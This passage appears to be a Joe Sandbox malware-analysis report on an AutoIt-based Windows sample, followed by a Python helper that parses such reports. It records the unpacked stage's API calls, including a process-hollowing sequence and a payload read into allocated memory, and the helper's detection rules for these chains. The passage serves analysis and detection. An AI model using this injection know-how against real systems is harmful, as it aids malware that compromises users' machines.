                        • Instruction Fuzzy Hash: DDA1F332E042048FDF19EFA8DC51FAE7BA4AB86320F14415DF8259B291D7359917CB92

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00983A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00A51418,?,00982E7F,?,?,?,00000000), ref: 00983A78
                          • Part of subcall function 00983357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00983379
                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0098356A
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 009C318D
                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009C31CE
                        • RegCloseKey.ADVAPI32(?), ref: 009C3210
                        • _wcslen.LIBCMT ref: 009C3277
                        • _wcslen.LIBCMT ref: 009C3286
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                        • API String ID: 98802146-2727554177
                        • Opcode ID: 9245be15385991372ff08ab56fbf324405645efd502d10b7f4517ac65d664445
                        • Instruction ID: 1680ea194c9e0bd0468f87038b395808c9887f6f1f7ab168a878a77a97158090
                        • Opcode Fuzzy Hash: 9245be15385991372ff08ab56fbf324405645efd502d10b7f4517ac65d664445
                        • Instruction Fuzzy Hash: 1571A1714083019EC704EFA5DC81BABBBE8FFD6760F40482EF4459B261EB349A49CB52

                        Control-flow Graph

                        APIs
                        • GetSysColorBrush.USER32(0000000F), ref: 00982B8E
                        • LoadCursorW.USER32(00000000,00007F00), ref: 00982B9D
                        • LoadIconW.USER32(00000063), ref: 00982BB3
                        • LoadIconW.USER32(000000A4), ref: 00982BC5
                        • LoadIconW.USER32(000000A2), ref: 00982BD7
                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00982BEF
                        • RegisterClassExW.USER32(?), ref: 00982C40
                          • Part of subcall function 00982CD4: GetSysColorBrush.USER32(0000000F), ref: 00982D07
                          • Part of subcall function 00982CD4: RegisterClassExW.USER32(00000030), ref: 00982D31
                          • Part of subcall function 00982CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00982D42
                          • Part of subcall function 00982CD4: InitCommonControlsEx.COMCTL32(?), ref: 00982D5F
                          • Part of subcall function 00982CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00982D6F
                          • Part of subcall function 00982CD4: LoadIconW.USER32(000000A9), ref: 00982D85
                          • Part of subcall function 00982CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00982D94
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                        • String ID: #$0$AutoIt v3
                        • API String ID: 423443420-4155596026
                        • Opcode ID: ce782979b4c1658a07ac46028365972f8e45168724b7c8bde56582ae0ed4b6a4
                        • Instruction ID: badd881b661a347918ceca7c4d2a1c87f43f895edf7c6a77b40d8857cddc525c
                        • Opcode Fuzzy Hash: ce782979b4c1658a07ac46028365972f8e45168724b7c8bde56582ae0ed4b6a4
                        • Instruction Fuzzy Hash: 27214970E40318ABDB50DFE6EC69BA97FB4FB48B65F00415AE500AA6A0D3B10942CF94

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 443 983170-983185 444 9831e5-9831e7 443->444 445 983187-98318a 443->445 444->445 448 9831e9 444->448 446 9831eb 445->446 447 98318c-983193 445->447 452 9c2dfb-9c2e23 call 9818e2 call 99e499 446->452 453 9831f1-9831f6 446->453 449 983199-98319e 447->449 450 983265-98326d PostQuitMessage 447->450 451 9831d0-9831d8 DefWindowProcW 448->451 455 9c2e7c-9c2e90 call 9ebf30 449->455 456 9831a4-9831a8 449->456 458 983219-98321b 450->458 457 9831de-9831e4 451->457 487 9c2e28-9c2e2f 452->487 459 9831f8-9831fb 453->459 460 98321d-983244 SetTimer RegisterWindowMessageW 453->460 455->458 481 9c2e96 455->481 462 9c2e68-9c2e77 call 9ec161 456->462 463 9831ae-9831b3 456->463 458->457 466 9c2d9c-9c2d9f 459->466 467 983201-983214 KillTimer call 9830f2 call 983c50 459->467 460->458 464 983246-983251 CreatePopupMenu 460->464 462->458 470 9c2e4d-9c2e54 463->470 471 9831b9-9831be 463->471 464->458 473 9c2dd7-9c2df6 MoveWindow 466->473 474 9c2da1-9c2da5 466->474 467->458 470->451 484 9c2e5a-9c2e63 call 9e0ad7 470->484 479 983253-983263 call 98326f 471->479 480 9831c4-9831ca 471->480 473->458 482 9c2dc6-9c2dd2 SetFocus 474->482 483 9c2da7-9c2daa 474->483 479->458 480->451 480->487 481->451 482->458 483->480 488 9c2db0-9c2dc1 call 9818e2 483->488 484->451 487->451 492 9c2e35-9c2e48 call 9830f2 call 983837 487->492 488->458 492->451
                        APIs
                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0098316A,?,?), ref: 009831D8
                        • KillTimer.USER32(?,00000001,?,?,?,?,?,0098316A,?,?), ref: 00983204
                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00983227
                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0098316A,?,?), ref: 00983232
                        • CreatePopupMenu.USER32 ref: 00983246
                        • PostQuitMessage.USER32(00000000), ref: 00983267
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                        • String ID: TaskbarCreated
                        • API String ID: 129472671-2362178303
                        • Opcode ID: c4efffd89bd5b1c88c0bbed485c3c445e92e3b4c89adcada16002c8702b20a96
                        • Instruction ID: d68de94d3d924660a72d3310fa093bb9a38a956518a314667e8f53940aac95ee
                        • Opcode Fuzzy Hash: c4efffd89bd5b1c88c0bbed485c3c445e92e3b4c89adcada16002c8702b20a96
                        • Instruction Fuzzy Hash: 4A412435244304AADF15BBB89C1DBBD3A1DFB45F11F04C529F912863E1EBB49A4287A2

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 499 9b8d45-9b8d55 500 9b8d6f-9b8d71 499->500 501 9b8d57-9b8d6a call 9af2c6 call 9af2d9 499->501 503 9b90d9-9b90e6 call 9af2c6 call 9af2d9 500->503 504 9b8d77-9b8d7d 500->504 518 9b90f1 501->518 523 9b90ec call 9b27ec 503->523 504->503 507 9b8d83-9b8dae 504->507 507->503 510 9b8db4-9b8dbd 507->510 513 9b8dbf-9b8dd2 call 9af2c6 call 9af2d9 510->513 514 9b8dd7-9b8dd9 510->514 513->523 516 9b8ddf-9b8de3 514->516 517 9b90d5-9b90d7 514->517 516->517 522 9b8de9-9b8ded 516->522 520 9b90f4-9b90f9 517->520 518->520 522->513 525 9b8def-9b8e06 522->525 523->518 528 9b8e08-9b8e0b 525->528 529 9b8e23-9b8e2c 525->529 530 9b8e0d-9b8e13 528->530 531 9b8e15-9b8e1e 528->531 532 9b8e4a-9b8e54 529->532 533 9b8e2e-9b8e45 call 9af2c6 call 9af2d9 call 9b27ec 529->533 530->531 530->533 536 9b8ebf-9b8ed9 531->536 534 9b8e5b-9b8e79 call 9b3820 call 9b29c8 * 2 532->534 535 9b8e56-9b8e58 532->535 563 9b900c 533->563 572 9b8e7b-9b8e91 call 9af2d9 call 9af2c6 534->572 573 9b8e96-9b8ebc call 9b9424 534->573 535->534 538 9b8edf-9b8eef 536->538 539 9b8fad-9b8fb6 call 9bf89b 536->539 538->539 542 9b8ef5-9b8ef7 538->542 550 9b9029 539->550 551 9b8fb8-9b8fca 539->551 542->539 548 9b8efd-9b8f23 542->548 548->539 553 9b8f29-9b8f3c 548->553 559 9b902d-9b9045 ReadFile 550->559 551->550 555 9b8fcc-9b8fdb GetConsoleMode 551->555 553->539 557 9b8f3e-9b8f40 553->557 555->550 562 9b8fdd-9b8fe1 555->562 557->539 564 9b8f42-9b8f6d 557->564 560 9b90a1-9b90ac GetLastError 559->560 561 9b9047-9b904d 559->561 566 9b90ae-9b90c0 call 9af2d9 call 9af2c6 560->566 567 9b90c5-9b90c8 560->567 561->560 568 9b904f 561->568 562->559 569 9b8fe3-9b8ffd ReadConsoleW 562->569 570 9b900f-9b9019 call 9b29c8 563->570 564->539 571 9b8f6f-9b8f82 564->571 566->563 579 9b90ce-9b90d0 567->579 580 9b9005-9b900b call 9af2a3 567->580 575 9b9052-9b9064 568->575 577 9b8fff GetLastError 569->577 578 9b901e-9b9027 569->578 570->520 571->539 582 9b8f84-9b8f86 571->582 572->563 573->536 575->570 585 9b9066-9b906a 575->585 577->580 578->575 579->570 580->563 582->539 589 9b8f88-9b8fa8 582->589 592 9b906c-9b907c call 9b8a61 585->592 593 9b9083-9b908e 585->593 589->539 604 9b907f-9b9081 592->604 599 9b909a-9b909f call 9b88a1 593->599 600 9b9090 call 9b8bb1 593->600 605 9b9095-9b9098 599->605 600->605 604->570 605->604
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 12c771a80df4127f05c9a9d93c4fe518448f62244f65879e25e22816f4004635
                        • Instruction ID: 29937a0ba75311bdb5150ea1142969c0dcc8a5850072ac8ff84a3cd5777b5bdf
                        • Opcode Fuzzy Hash: 12c771a80df4127f05c9a9d93c4fe518448f62244f65879e25e22816f4004635
                        • Instruction Fuzzy Hash: C7C1F474904349AFCB11EFE8D945BEEBBB8BF4A320F144199F914A7392C7349942CB61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 607 962610-9626be call 960000 610 9626c5-9626eb call 963520 CreateFileW 607->610 613 9626f2-962702 610->613 614 9626ed 610->614 619 962704 613->619 620 962709-962723 VirtualAlloc 613->620 615 96283d-962841 614->615 617 962883-962886 615->617 618 962843-962847 615->618 621 962889-962890 617->621 622 962853-962857 618->622 623 962849-96284c 618->623 619->615 624 962725 620->624 625 96272a-962741 ReadFile 620->625 626 9628e5-9628fa 621->626 627 962892-96289d 621->627 628 962867-96286b 622->628 629 962859-962863 622->629 623->622 624->615 634 962743 625->634 635 962748-962788 VirtualAlloc 625->635 630 9628fc-962907 VirtualFree 626->630 631 96290a-962912 626->631 636 9628a1-9628ad 627->636 637 96289f 627->637 632 96286d-962877 628->632 633 96287b 628->633 629->628 630->631 632->633 633->617 634->615 638 96278f-9627aa call 963770 635->638 639 96278a 635->639 640 9628c1-9628cd 636->640 641 9628af-9628bf 636->641 637->626 647 9627b5-9627bf 638->647 639->615 644 9628cf-9628d8 640->644 645 9628da-9628e0 640->645 643 9628e3 641->643 643->621 644->643 645->643 648 9627f2-962806 call 963580 647->648 649 9627c1-9627f0 call 963770 647->649 655 96280a-96280e 648->655 656 962808 648->656 649->647 657 962810-962814 FindCloseChangeNotification 655->657 658 96281a-96281e 655->658 656->615 657->658 659 962820-96282b VirtualFree 658->659 660 96282e-962837 658->660 659->660 660->610 660->615
                        APIs
                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 009626E1
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00962907
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFileFreeVirtual
                        • String ID:
                        • API String ID: 204039940-0
                        • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                        • Instruction ID: cb081bc59f4a6d8b7e87cdb391cf14ad4436f825a165ca43736360e02110f3c9
                        • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                        • Instruction Fuzzy Hash: FEA1F574E00209EBDB14CFA4C894BEEBBB5FF48304F208559E505BB280D779AA81DF95

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 671 982c63-982cd3 CreateWindowExW * 2 ShowWindow * 2
                        APIs
                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00982C91
                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00982CB2
                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00981CAD,?), ref: 00982CC6
                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00981CAD,?), ref: 00982CCF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$CreateShow
                        • String ID: AutoIt v3$edit
                        • API String ID: 1584632944-3779509399
                        • Opcode ID: 2f65e048e40f4dbd571a7e457ceb7ac6473690313637a234d1f72b38099bb396
                        • Instruction ID: 09ac8ab778c2f6351f0d8737dcec99fe8f2327c8aa8dfc1773919084b19c43c6
                        • Opcode Fuzzy Hash: 2f65e048e40f4dbd571a7e457ceb7ac6473690313637a234d1f72b38099bb396
                        • Instruction Fuzzy Hash: 26F03A795803907AEB708793AC1CFB72EBDE7C6F71F01401AF900AA5B0D2610842DAB0

                        Control-flow Graph (rendered graph image; legend: Executed / Not Executed)
                        control_flow_graph 786 9623b0-962509 call 960000 call 9622a0 CreateFileW 793 962510-962520 786->793 794 96250b 786->794 797 962527-962541 VirtualAlloc 793->797 798 962522 793->798 795 9625c0-9625c5 794->795 799 962545-96255c ReadFile 797->799 800 962543 797->800 798->795 801 962560-96259a call 9622e0 call 9612a0 799->801 802 96255e 799->802 800->795 807 9625b6-9625be ExitProcess 801->807 808 96259c-9625b1 call 962330 801->808 802->795 807->795 808->807
                        APIs
                          • Part of subcall function 009622A0: Sleep.KERNELBASE(000001F4), ref: 009622B1
                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009624FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CreateFileSleep
                        • String ID: LE0ZO3RNCFU1UFOJEXEV7QI
                        • API String ID: 2694422964-1889324611
                        • Opcode ID: fea47391bfe347af9bdf874a602f6abf269d660ca4c97fb712e094dac6c622be
                        • Instruction ID: 3a947de7aa20e406e4823176fd83e8c5888f64111de50c4448893e7b3023aa55
                        • Opcode Fuzzy Hash: fea47391bfe347af9bdf874a602f6abf269d660ca4c97fb712e094dac6c622be
                        • Instruction Fuzzy Hash: F3618270E14288DBEF11DBB4C854BEEBBB9AF55300F144199E209BB2C1D7BA1B44CB65

                        APIs
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009F2C05
                        • DeleteFileW.KERNEL32(?), ref: 009F2C87
                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 009F2C9D
                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009F2CAE
                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 009F2CC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: File$Delete$Copy
                        • String ID:
                        • API String ID: 3226157194-0
                        • Opcode ID: 8d36ea9b8231430247793b93ca6089fd0b8f0202cd405c2f7be922dcbf046d3e
                        • Instruction ID: db5c590cd4916086a1736d80a31349c064743f4d84c39ad3e7cb769c71c23f54
                        • Opcode Fuzzy Hash: 8d36ea9b8231430247793b93ca6089fd0b8f0202cd405c2f7be922dcbf046d3e
                        • Instruction Fuzzy Hash: D1B12D7290111DABDF11EFA4CC85FEEBB7DEF89350F1040A6F609E6151EA349A448BA1

                        Control-flow Graph (rendered graph image; legend: Executed / Not Executed)
                        control_flow_graph 952 983b1c-983b27 953 983b99-983b9b 952->953 954 983b29-983b2e 952->954 955 983b8c-983b8f 953->955 954->953 956 983b30-983b48 RegOpenKeyExW 954->956 956->953 957 983b4a-983b69 RegQueryValueExW 956->957 958 983b6b-983b76 957->958 959 983b80-983b8b RegCloseKey 957->959 960 983b78-983b7a 958->960 961 983b90-983b97 958->961 959->955 962 983b7e 960->962 961->962 962->959
                        APIs
                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00983B0F,SwapMouseButtons,00000004,?), ref: 00983B40
                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00983B0F,SwapMouseButtons,00000004,?), ref: 00983B61
                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00983B0F,SwapMouseButtons,00000004,?), ref: 00983B83
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        • Opcode ID: 7e35d246d8edee291c3b699eabee9c99b980b7a9f49bf2e7ba48aed96d286a17
                        • Instruction ID: d2e7fd06a1e2244991fea19a49684231b4832544c2af3367a42ba2ff532d1706
                        • Opcode Fuzzy Hash: 7e35d246d8edee291c3b699eabee9c99b980b7a9f49bf2e7ba48aed96d286a17
                        • Instruction Fuzzy Hash: 02112AB5510208FFDB20DFA5DC44AFEB7BCEF04B94B108959A805D7210E2319F419B60
                        APIs
                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00961A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00961AF1
                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00961B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702116243.0000000000960000.00000040.00001000.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_960000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                        • Instruction ID: 1fb1d6d2ba1cb95cd1e58b0b179e06e93f6d41aa2babec6605a05217da1e203c
                        • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                        • Instruction Fuzzy Hash: CE622F30A14258DBEB24CFA4C850BDEB376EF58300F1491A9D10DEB394E77A9E81CB59
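The helper below is an added example, not part of the Joe Sandbox report or its IDA plugin. It parses the 'APIs' and 'control_flow_graph' lines of listings like the ones above (a few of them are embedded as constructed input), decodes the CreateFileW access/disposition and Sleep arguments, and flags two API chains that this report exhibits: CreateProcessW + Wow64GetThreadContext + ReadProcessMemory at 00961A5B..00961B13, which fits the thread-context injection the report's signatures list (Wow64GetThreadContext targets a 32-bit child), and CreateFileW + VirtualAlloc + ReadFile in the 9623b0 function, a file-backed payload load preceded by a 500 ms Sleep. It also decodes the .sdmp file name of the 00960000 dump, which the report marks "based on PE: false", to show that it is PAGE_EXECUTE_READWRITE private memory, i.e. the unpacked stage rather than the AutoIt image at 00980000. The chain groupings and the .sdmp field layout are this example's assumptions; the GetTempFileNameW 'aut' prefix check matches the temp-file naming of the AutoIt runtime shown further down.

```python
"""Triage helper for the per-function listings of a Joe Sandbox IDA-plugin report
(added example, not Joe Sandbox's own code).  It parses 'APIs' and 'control_flow_graph'
lines, decodes triage-relevant arguments and flags suspicious API chains; the chain
definitions and the assumed .sdmp name layout are this example's own."""
import re
from collections import namedtuple

Call = namedtuple("Call", "api module args ref subcall")
# e.g. "• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00961AF1"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# Assumed layout <pid>.<n>.<ts>.<base>.<protect>.<x>.<type>.<y>.sdmp (inferred from this report, not documented).
DUMP_RE = re.compile(r"\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}"
                     r"\.([0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$")
PROTECT = {0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEMTYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
GENERIC = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"), (0x20000000, "GENERIC_EXECUTE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
# A chain is a list of alternative sets; a function matches when every set is represented.
CHAINS = {
    "process hollowing / thread-context injection": [
        {"CreateProcessW", "CreateProcessA"}, {"GetThreadContext", "Wow64GetThreadContext"},
        {"ReadProcessMemory", "WriteProcessMemory", "NtUnmapViewOfSection"}],
    "payload file read into memory": [
        {"CreateFileW", "CreateFileA"}, {"VirtualAlloc", "VirtualAllocEx"}, {"ReadFile"}],
}

def parse_report(text):
    """One dict per function: {'cfg': str|None, 'calls': [Call, ...]}."""
    funcs, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s.startswith("control_flow_graph"):
            # The graph text precedes the 'APIs' block and can name APIs the block omits.
            cur = {"cfg": s, "calls": [], "apis_seen": False}
            funcs.append(cur)
            for tok in s.split():  # capitalised mixed-case tokens are API names, not hex
                if tok[0].isupper() and any(ch.islower() for ch in tok):
                    cur["calls"].append(Call(tok, None, (), None, None))
        elif s == "APIs":
            if cur is None or cur["apis_seen"]:
                cur = {"cfg": None, "calls": [], "apis_seen": False}
                funcs.append(cur)
            cur["apis_seen"] = True
        else:
            m = API_RE.match(s)
            if m and cur is not None:
                args = tuple(m.group("args").split(",")) if m.group("args") else ()
                cur["calls"].append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return funcs

def hexval(tok):
    try:
        return int(tok, 16)
    except ValueError:  # '?' (unknown) or a string argument such as 'aut'
        return None

def describe_call(call):
    """Decode the argument patterns that matter for triage; '' otherwise."""
    if call.api in ("CreateFileW", "CreateFileA") and len(call.args) >= 5:
        access, disp = hexval(call.args[1]), hexval(call.args[4])
        names = [n for bit, n in GENERIC if access is not None and access & bit]
        return "%s, %s" % ("|".join(names) or "access=?", DISPOSITION.get(disp, "disp=?"))
    if call.api == "Sleep" and call.args and hexval(call.args[0]) is not None:
        return "%d ms" % hexval(call.args[0])
    return ""

def flag(func):
    """Labels of every chain the function satisfies, plus the AutoIt temp-file hint."""
    names = {c.api for c in func["calls"]}
    hits = [label for label, groups in CHAINS.items() if all(names & g for g in groups)]
    for c in func["calls"]:  # GetTempFileNameW(lpPathName, lpPrefixString, ...)
        if c.api in ("GetTempFileNameW", "GetTempFileNameA") and len(c.args) > 1 and c.args[1] == "aut":
            hits.append("AutoIt temp file prefix 'aut'")  # the runtime's %TEMP%\aut*.tmp files
    return hits

def describe_dump(name):
    """Protection/type from an .sdmp name; non-PE-backed RWX private memory is unpacked code."""
    base, prot, typ = DUMP_RE.search(name).groups()
    p, t = int(prot, 16), int(typ, 16)
    return {"base": int(base, 16), "protect": PROTECT.get(p, hex(p)),
            "type": MEMTYPE.get(t, hex(t)), "rwx_private": p == 0x40 and t == 0x20000}

# Constructed input: lines copied from the listings above (graph line shortened).
SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00961A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00961AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00961B13
control_flow_graph 786 9623b0-962509 call 960000 call 9622a0 CreateFileW 793 962510-962520 786->793 797 962527-962541 VirtualAlloc 793->797 799 962545-96255c ReadFile 797->799 807 9625b6-9625be ExitProcess 801->807
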